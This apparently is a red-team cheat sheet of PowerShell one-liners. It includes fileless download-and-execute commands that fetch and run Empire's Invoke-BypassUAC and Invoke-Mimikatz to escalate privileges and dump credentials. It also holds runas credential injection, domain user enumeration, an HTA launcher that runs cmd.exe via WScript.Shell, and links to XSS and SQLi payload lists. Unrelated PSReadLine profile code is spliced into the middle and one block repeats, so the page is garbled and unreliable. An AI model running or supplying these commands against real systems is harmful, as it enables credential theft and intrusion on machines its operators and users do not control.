MK xblack199

Red Teaming tool

General usefull Powershell Scripts
AMSI Bypass restriction Bypass
Payload Hosting
Network Share Scanner
Lateral Movement
Reverse Shellz
POST Exploitation

Description:

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start     powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

	<#
	.SYNOPSIS
	Optimizes your PSReadline history save file.
	.DESCRIPTION
	Optimizes your PSReadline history save file by removing duplicate
	entries and optionally removing commands that are not longer than
	a minimum length
	.EXAMPLE
	C:\PS> Optimize-PSReadlineHistory
	Removes all the duplicate commands.

	# Other hosts (ISE, ConEmu) don't always work as well with PSReadLine.
	# Also, if PS is run with -Command, PSRL loading is suppressed.
	$psrlMod = Get-Module PSReadLine
	if (($null -eq $psrlMod) -or ($host.Name -eq 'Windows PowerShell ISE Host')) {
	return
	}
	elseif ($psrlMod.Version.Major -lt 2) {
	throw "PSReadLine 1.x installed or not imported, import PSRL or ugprade to at least 2.x."
	}

	if (($PSVersionTable.PSVersion.Major -le 5) -or $IsWindows) {
	Set-Alias nano 'C:\Program Files\Git\usr\bin\nano.exe'
	Set-Alias vim 'C:\Program Files\Git\usr\bin\vim.exe'
	}

	# Edition/platform specific configuration
	if ($IsWindows) {
	$env:PAGER = 'less -Ps"Page %db?B of %D:.\. Press h for help or Q to quit\."'
	if ($PSVersionTable.PSEdition -eq 'Desktop') {
	$PSDefaultParameterValues['Get-Help:Full'] = $true

	# Enumeration

	# Credential Injection

	runas.exe /netonly /user:<domain>\<username> cmd.exe


	# enumeration users
	users
	net user /domain

	# Enumeration

	# Credential Injection

	runas.exe /netonly /user:<domain>\<username> cmd.exe


	# enumeration users
	users
	net user /domain


	🔥Complete Bug Bounty Cheat Sheet🔥

	XSS
	https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
	https://github.com/ismailtasdelen/xss-payload-list

	SQLi
	https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md

	<html>
	<head>
	<HTA:APPLICATION ID="HelloExample">
	<script language="jscript">
	var c = "cmd.exe /c calc.exe";
	new ActiveXObject('WScript.Shell').Run(c);
	</script>
	</head>
	<body>
	<script>self.close();</script>

	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set